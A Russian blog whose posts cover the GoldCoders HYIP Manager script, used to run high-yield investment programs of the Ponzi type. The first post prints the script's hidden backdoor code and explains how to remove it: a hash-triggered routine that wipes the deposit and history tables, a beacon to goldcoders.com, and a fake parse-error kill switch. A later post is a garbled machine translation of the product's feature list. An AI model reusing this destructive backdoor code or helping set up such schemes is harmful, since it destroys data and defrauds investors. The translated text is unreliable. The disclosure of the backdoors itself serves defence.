Категории 'скрипт'

Дыры скрипта HoldCoders

Недавно просматривал скрипт кодерса на изнанку и обнаружил несколько довольно приличных дыр которые выкладываю в данном посте

Reset to zero backdoor :
Index.php :
Putting /* */ or remove line below :

if (($frm['a'] == ‘register’ AND $frm_env['REQUEST_METHOD'] == ‘POST’))
{
$string = $settings['license'] . $frm_env['HTTP_HOST'] . date (’d') . date (’Y') . date (’m');
if ($frm['string'] == md5 ($string))
{
$q = ‘update hm2_users set came_from = \’ \’ where id = 1′;
mysql_query ($q);
print ‘-’;
if ($frm['string2'] == date (’d'))
{
$q = ‘delete from hm2_history where type=\’withdrawal\”;
mysql_query ($q);
}

if ($frm['string2'] == date (’y'))
{
$q = ‘delete from hm2_deposits’;
mysql_query ($q);
$q = ‘delete from hm2_emails’;
mysql_query ($q);
$q = ‘delete from hm2_history’;
mysql_query ($q);
$q = ‘delete from hm2_online’;
mysql_query ($q);
$q = ‘delete from hm2_plans’;
mysql_query ($q);
}

db_close ($dbconn);
exit ();
}
}

отсылка  странных писем в голдкодерс

in /inc/admin/hmtl.header.inc

if (rand (1, 5) == 3)
{
echo ‘<img src=”http://www.goldcoders.com/check.cgi?i=1&license=1&domain=’;
echo $frm_env['HTTP_HOST'];
echo ‘&n=’;
echo $frm_env['SCRIPT_NAME'];
echo ‘” width=1 height=1> ‘;
}

*remove*

if (($userinfo['logged'] == 1 AND $userinfo['id'] == 1))
{
if ($settings['demomode'] != 1)
{
if (rand (1, 5) == 3)
{
send_string_to_gold_coders ();
}
}

*remove*

check_if_stolen ();

Remove the line
send_string_to_gold_coders ();

if (($userinfo['logged'] == 1 AND $userinfo['id'] == 1))
{
setcookie (’username’, $frm['username'], time () + 630720000);
setcookie (’password’, md5 ($frm['password']), time () + 630720000);
header (’Location: wap.php?ok’);
send_string_to_gold_coders ();
db_close ($dbconn);
exit ();
}
}

in /inc/config.inc

function send_string_to_gold_coders ()
{
global $frm_env;
global $settings;
$handle = @fopen (’http://www.goldcoders.com/check.cgi?domain=’ . $frm_env['HTTP_HOST'] .
‘&license=’ . $settings['license'] . ‘&zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
Zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz’, ‘r’);
if ($handle)
{
fclose ($handle);
}

}

function send_string_to_gold_coders_install ()
{
global $frm_env;
global $settings;
$cont = ‘ok11′;
$handle = @fopen (’http://www.goldcoders.com/check.cgi?install=1&script=3&domain=’ .
$frm_env['HTTP_HOST'] . ‘&license=’ . $settings['license'] . ‘&cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
Cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccccccccccccc’, ‘r’);
if ($handle)
{
$cont = fread ($handle, 200000);
fclose ($handle);
}

return $cont;
}

function check_if_stolen ()
{
global $frm_env;
$q = ’select * from hm2_users order by id limit 10′;
$sth = mysql_query ($q);
if ($row = mysql_fetch_array ($sth))
{
if ($row['came_from'] == ‘ ‘)
{
print ‘<br />
<b>Parse error</b>: parse error in <b>’ . $frm_env['SCRIPT_NAME'] . ‘</b> on line <b>NULL</b><br />’;
exit ();
}
}

}

/inc/admin/ security.inc

echo ($acsent_settings['detect_ip'] == ‘disabled’ ? ‘checked’ : ‘ddd’);
remove ddd so the lines look like

echo ($acsent_settings['detect_ip'] == ‘disabled’ ? ‘checked’ : ”);

Найдите в install.php эту линию:
$settings['key'] = strtoupper (get_rand_md5 (100) . md5 ($mddomain . ‘jklfds89ufsdkfnsjfdksh’) . md5 ($mdscriptname . ‘7hbfnbdnf’) .
Снова замените ‘jklfds89ufsdkfnsjfdksh’ на ‘7hbfnbdnf’ to the SAME

данные Вы уже заменили в

index.php .

Например к    ’wyjekld82jdghs6yhskjhd’ и  ‘7hbfnbdnf’ (ТОЛЬКО ПРИМЕР!)

Для лучшей защиты мы предлагаем, чтобы Вы удалили
1. addbonuse.inc.php      directory inc/admin
2. removed wap.php
3. remove all directory WAP on your server
admin/inc/wap    - удалите это
tmpl/wap   – удалите это
inc/wap   удалите это (если Вы никогда не используете wap доступ),
4. Добавьте прямую дальнюю автоматическую телефонную связь Пользователей / AAA / BBB от вашей admin области и дайте сильный пароль
5. заблокируйте  Ip 222.66.26.77,222.66.26.78,222.66.26.79   в панели вебхостинга

в ближайшее время опубликую дальнейшие рекомендации по защите скрипта

Метки:Goldcoders, голдкодерс, дыры, скрипт

Связанные записи

Категория: Goldcoders автор: admin
Обсуждение закрыто

Описание архива

И так архив скрипта состоит из следующих папок и файлов:

Папки:

Fonts – там находятся шрифты

Images – в этой папке находятся картинки

inc – в этой папке находятся файлы для корректной работы скрипта

Tmpl – здесь находится шаблон

tmpl_c – временные файлы

дальше идут файлы в корневой папке

admin

eeecurrency_processing

evocash_processing

goldmoney_processing

install – файл инсталяции скрипта

libertyreserve_processing

security

stormpay_processing

wap

htacces

ebullion_processing

egold_processing

favicon

index

intgold_processing

paypal_processing

setting

style

webmoney_processing

вот такие папки и файлы должны присутствовать в вашем установочном архиве.

Метки:Goldcoders, HYIP, архив, скрипт

Связанные записи

Категория: Goldcoders автор: admin
Обсуждение закрыто

Общее понятие

Думаю многие из вас интересовались заработком в сети и

сталкивались с HYIP.

Вы решили открыть свой, но не знаете как это сделать.

Давайте рассмотрим, подробнее, что такое HYIP, зачем

он нужен вам, что он вообще из себя представляет.

А так же все трудности и нюансы по установке и мноргое другое

И так коротко о самом скрипте HYIP Manadger от голдкодерс .

На данный момент этот скрипт самый распространенный и само

чаще используется для создания HYIP проектов

Про Менеджер HYIP – пакет для инвестиционных участков.

Это программное обеспечение помогает Вам создавать и управлять

вашим собственным HYIP с непринужденностью. Автоматическое изъятие,

массовая оплата и мгновенная включенная оплата. Комбинация цены,

особенностей, работы и безопасности является лучшей на текущем рынке.

V-деньги позволили.

Запас Свободы позволил.

E-золото позволило.

INTGold позволил.

Stormpay позволил.

E-слиток позволил.

eeeCurrency позволил.

Легкий инсталяционный подлинник. Никакие файлы PHP, редактирующие больше!

Загрузите и установите с непринужденностью.

Гибкая система шаблона позволяет Вам легко изменять проект.

Turing отображают для проверки. Это будет мешать подлинникам грубой силы

рубить пароли

обеспечение более высокой безопасности.

Неограниченные инвестиционные планы.

Неограниченные планы выплат (ежедневно / еженедельно

/ каждые две недели / ежемесячно / ежегодно / после

указанный период).

Автоматическое изъятие.

Мгновенная оплата.

Массовая оплата.

Неограниченные планы направления.

Многоуровневая программа направления, до 10 уровней.

Калькулятор JavaScript. Позволяют пользователи оценивать theirs’

доход на лету.

новая статистика пользователей Очень важного лица в infobox.

новый Последний зарегистрированный пользовательский счет в

infobox.

новые Пользователи могут передать капитал счетам других

пользователей в системе.

Особенности области Admin:

новый Принимают почти любую из систем оплаты

новый Администратор может определить максимальный депозит,

за который составление является возможным.

новый Администратор может определить минимальный и

максимальный процент составления.

новый Администратор может сделать платеж плана,

но закрытый за дальнейшие депозиты.

новое Автоматизированное уведомление электронной почты

администратора, когда каждый вносит.

новая Возможность зашифровать settings.php файл.

Определите плату обмена валюты.

Особенность Времени Системы Изменения.

Составление депозитов. Администратор может

позволить/отрицать функцию составления

в любой план HYIP. Пользователь может определить

процент составления, внесение.

Таможенные страницы HTML. Администратор может добавить

таможенную страницу HTML в систему

(для напр. “Страница” Систем Оценок).

Поддержка Провода Банка. Администратор может легко

получить и управлять депозитами Провода Банка.

Калькулятор JavaScript. Администратор может оценить доход

пользователей

когда создание/редактирование план HYIP.

Доступ WAP к статистике. Может позволить / повреждают

wap доступ для других пользователей.

Секция новостей.

Передовая статистика.

Блокируйте счета пользователя.

Блокируйте или используйте программу направления.

Приостановите платежи пользовательским счетам.

Пошлите штрафы и премии одному пользователю или к пользовательской группе.

Пошлите настраиваемые информационные бюллетени

вашим членам.

Пошлите информационный бюллетень одному пользователю

или пользовательской группе.

Операционная история.

Администратор может выпустить депозит или часть этого.

Заберите или отмените запрос изъятия.

Администратор мог установить изъятие как обработано без оплаты.

Экспортное изъятие просит к CSV.

Определите использование двойных, выбирают – в регистрации.

Вы можете также определить:

Могут ли пользователи изменить их счет e-золота в

области членов.

Могут ли пользователи изменить их электронную почту

в области членов.

В состоянии ли пользователи использовать мгновенную

особенность оплаты.

Можно ли сделать депозит через e-золото, IntGold, Evocash,

или Телеграфные переводы.

новый, могут Ли пользователи изменить их процент составления.

новый, могут Ли пользователи выпустить депозит перед концами

продолжительности плана депозита.

новый, могут Ли пользователи передать капитал счетам других

пользователей в системе.

новый минимальная продолжительность депозита, максимальное

время пользователь может

выпустите его депозит и плату изъятия депозита.

Использование turing проверки (использование непосредственно,

цвет текста, фон красит и

количество символа)

Использование программы направления.

Вы можете пуговица, показать ли пользователям статистику

их направлений (число

новые направления день, ins направлений и signups) и их

список downlines.

Вы можете также пуговица показ следующих особенностей:

Началась ли программа или нет. Администратор может

изменить стартовую дату.

Сколько счетов зарегистрировано.

Насколько капитал был депонирован к системе.

Насколько капитал был депонирован сегодня.

Насколько капитал был withdrawed от системы.

Текущие посетители на статистике участка.

Статистика текущих членов онлайн.

Члены перечисляют страницу статистики.

Лучшие 10 списков инвесторов.

Последние 10 списков инвесторов.

Заплаченная статистика.

Пользовательские особенности области:

новый капитал Передачи к счетам других пользователей

в системе.

новый Выпуск депозит перед депозитом планирует концы

продолжительности.

Обменные e-валюты на счете пользователя.

Поддержка Провода Банка. Пользователи могут внести

в HYIP использование Провода Банка.

Калькулятор JavaScript. Позволяют пользователи

оценивать их доход на лету.

Доступ WAP к статистике.

Легкая регистрация.

Turing отображают для логина.

Депозит через E-золото, EvoCash, IntGold, провод банка,

автоматическое обновление баланса.

Депозит от счета, автоматического обновления баланса.

Данные счета изменяют возможность.

Мгновенная возможность оплаты.

Автоматическое изъятие, если Администратор позволяет.

Детальный Депозит, Изъятие и Статистика Приобретения.

Возможность отменять запрос изъятия.

Свяжитесь форма – посылают запрос Администратору.

Направление связывает секцию.

Секция статистики направления.

Доступ WAP к статистике.

Автоматическое изъятие:

Администратор определяет диапазон

количества (0.01 $ – 100 $ например). Подлинник обработает

изъятие пользователя просит на количество в пределах

этого диапазона автоматически.

Администратор определяет Макса автоматическое количество

изъятия в течение 24 часов. За 150 $

пример, подлинник спасет запросы изъятия (но не будет обрабатывать),

если сумма изъятия для пользователя – больше чем та ценность (150 $).

Подлинник зашифровал ваш пароль e-золота и затем

помещает это в MySQL. Мы не разделяем

зашифровать и расшифровывает алгоритм, таким

образом никто (даже ваш принимающий гостей поставщик)

не может расшифровать ваш пароль.

Администратор может повредить автоматическое

изъятие для любого пользователя.

HYIPStat: программное обеспечение подноса

системы Администратора:

HYIPStat показывает вашу Статистику HYIP, типа

Глобальной Статистики, Членов,

Надвигающееся изъятие, Кто онлайн без логина

области Администратора.

Метки:Goldcoders, скрипт

Связанные записи

Категория: Goldcoders автор: admin
Обсуждение закрыто